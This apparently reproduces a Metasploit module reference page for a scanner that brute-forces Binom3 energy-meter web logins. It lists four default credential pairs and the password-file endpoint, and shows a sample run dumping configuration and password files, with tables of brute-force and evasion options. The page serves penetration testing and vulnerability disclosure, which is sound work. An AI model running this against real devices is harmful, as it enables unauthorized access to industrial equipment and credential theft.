Binom3 Web Management Login Scanner, Config and Password File Dump - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/binom3_login_config_pass_dump metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Binom3 Web Management Login Scanner, Config and Password File Dump
Module: auxiliary/scanner/http/binom3_login_config_pass_dump
Source code: modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb
Disclosure date: -
Last modification time: 2022-01-23 15:28:32 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-5162

This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/binom3_login_config_pass_dump
msf auxiliary(binom3_login_config_pass_dump) > show options
    ... show and set options ...
msf auxiliary(binom3_login_config_pass_dump) > set RHOSTS ip-range
msf auxiliary(binom3_login_config_pass_dump) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(binom3_login_config_pass_dump) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(binom3_login_config_pass_dump) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(binom3_login_config_pass_dump) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts:

  1. root/root
  2. admin/1
  3. alg/1
  4. user/1

In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found.

Verification Steps


  1. Do: use auxiliary/scanner/http/binom3_login_config_pass_dump
  2. Do: set RHOSTS [IP]
  3. Do: set RPORT [PORT]
  4. Do: run

Scenarios


msf > use auxiliary/scanner/http/binom3_login_config_pass_dump
msf auxiliary(binom3_login_config_pass_dump) > set rhosts 1.3.3.7
msf auxiliary(binom3_login_config_pass_dump) > run

[+] 1.3.3.7:80 - Binom3 confirmed...
[*] 1.3.3.7:80 - Trying username:"root" with password:"root"
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "root":"root"
[+] ++++++++++++++++++++++++++++++++++++++
[+] 1.3.3.7 - dumping configuration
[+] ++++++++++++++++++++++++++++++++++++++
[+] 1.3.3.7:80 - File retrieved successfully!
[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000003_moduletest_1.3.3.7_Binom3_config_165927.txt
[+] ++++++++++++++++++++++++++++++++++++++
[+] 1.3.3.7 - dumping password file
[+] ++++++++++++++++++++++++++++++++++++++
[+] 1.3.3.7:80 - File retrieved successfully!
[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000004_moduletest_1.3.3.7_Binom3_passw_010954.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/binom3_login_config_pass_dump auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/binom3_login_config_pass_dump

msf6 auxiliary(scanner/http/binom3_login_config_pass_dump) > show info

       Name: Binom3 Web Management Login Scanner, Config and Password File Dump
     Module: auxiliary/scanner/http/binom3_login_config_pass_dump
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Karn Ganeshen <[email protected]>

Check supported:
  No

Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  BLANK_PASSWORDS   false            no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false            no        Add all passwords in the current database to the list
  DB_ALL_USERS      false            no        Add all users in the current database to the list
  PASSWORD          root             no        A specific password to authenticate with
  PASS_FILE                          no        File containing passwords, one per line
  Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT             80               yes       The target port (TCP)
  SSL               false            no        Negotiate SSL/TLS for outgoing connections
  STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
  THREADS           1                yes       The number of concurrent threads (max one per host)
  USERNAME          root             no        A specific username to authenticate as
  USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false            no        Try the username as the password for all users
  USER_FILE                          no        File containing usernames, one per line
  VERBOSE           true             yes       Whether to print output for all attempts
  VHOST                              no        HTTP server virtual host

Description:
  This module scans for Binom3 Multifunctional Revenue Energy Meter 
  and Power Quality Analyzer management login portal(s), and attempts 
  to identify valid credentials. There are four (4) default accounts - 
  'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to 
  device config, 'root' user can also access password file. Other 
  users - admin, alg, user - can only access configuration file. The 
  module attempts to download configuration and password files 
  depending on the login user credentials found.

References:
  https://us-cert.cisa.gov/ics/advisories/ICSA-17-031-01A
  https://nvd.nist.gov/vuln/detail/CVE-2017-5162

Module Options


This is a complete list of options available in the scanner/http/binom3_login_config_pass_dump auxiliary module:

msf6 auxiliary(scanner/http/binom3_login_config_pass_dump) > show options

Module options (auxiliary/scanner/http/binom3_login_config_pass_dump):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD          root             no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/binom3_login_config_pass_dump auxiliary module:

msf6 auxiliary(scanner/http/binom3_login_config_pass_dump) > show advanced

Module advanced options (auxiliary/scanner/http/binom3_login_config_pass_dump):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   MaxGuessesPerService  0                                                   no        Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used.
   MaxGuessesPerUser     0                                                   no        Maximum guesses for a particular username for the service instance. Note that users are considered unique among different services, so a user at 10.1.1.1:22
                                                                                        is different from one at 10.2.2.2:22, and both will be tried up to the MaxGuessesPerUser limit. If set to zero or a non-number, this option will not be use
                                                                                       d.
   MaxMinutesPerService  0                                                   no        Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used.
   PASSWORD_SPRAY        false                                               yes       Reverse the credential pairing order. For each password, attempt every possible user.
   REMOVE_PASS_FILE      false                                               yes       Automatically delete the PASS_FILE on module completion
   REMOVE_USERPASS_FILE  false                                               yes       Automatically delete the USERPASS_FILE on module completion
   REMOVE_USER_FILE      false                                               yes       Automatically delete the USER_FILE on module completion
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   TRANSITION_DELAY      0                                                   no        Amount of time (in minutes) to delay before transitioning to the next user in the array (or password when PASSWORD_SPRAY=true)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/binom3_login_config_pass_dump module can do:

msf6 auxiliary(scanner/http/binom3_login_config_pass_dump) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/binom3_login_config_pass_dump auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/binom3_login_config_pass_dump) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<RHOST>:<RPORT> - HTTP Connection Failed...


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - HTTP Connection Failed..." error message:

90:	          'uri' => '/',
91:	          'method' => 'GET'
92:	        }
93:	      )
94:	    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
95:	      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
96:	      return false
97:	    end
98:	
99:	    if (res && res.code == 200 && res.headers['Server'] && (res.headers['Server'].include?('Team-R Web') || res.body.include?('binom_ico') || res.body.include?('team-r')))
100:	

<RHOST>:<RPORT> - Application does not appear to be Binom3. Module will not continue.


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Application does not appear to be Binom3. Module will not continue." error message:

100:	
101:	      print_good("#{rhost}:#{rport} - Binom3 confirmed...")
102:	
103:	      return true
104:	    else
105:	      print_error("#{rhost}:#{rport} - Application does not appear to be Binom3. Module will not continue.")
106:	      return false
107:	    end
108:	  end
109:	
110:	  #

<RHOST>:<RPORT> - HTTP Connection Failed...


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - HTTP Connection Failed..." error message:

128:	        }
129:	      )
130:	
131:	    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
132:	
133:	      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
134:	      return :abort
135:	
136:	    end
137:	
138:	    if (res && res.code == 302 && res.get_cookies.include?('IDSESSION'))

<RHOST>:<RPORT> - Failed to retrieve configuration


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Failed to retrieve configuration" error message:

172:	          rport,
173:	          'Binom3 device config'
174:	        )
175:	        print_status("#{rhost}:#{rport} - Configuration file saved in: #{path}")
176:	      else
177:	        print_error("#{rhost}:#{rport} - Failed to retrieve configuration")
178:	        return
179:	      end
180:	
181:	      # Attempt to dump password file
182:	      config_uri = '~cfg_ask_xml?type=passw'

FAILED LOGIN - <RHOST>:<RPORT> - <USER.INSPECT>:<PASS.INSPECT>


Here is a relevant code snippet related to the "FAILED LOGIN - <RHOST>:<RPORT> - <USER.INSPECT>:<PASS.INSPECT>" error message:

197:	          'Binom3 device config'
198:	        )
199:	        print_status("#{rhost}:#{rport} - Password file saved in: #{path}")
200:	      else
201:	        return
202:	      end
203:	    else
204:	      print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
205:	    end
206:	  end
207:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Karn Ganeshen <KarnGaneshen[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.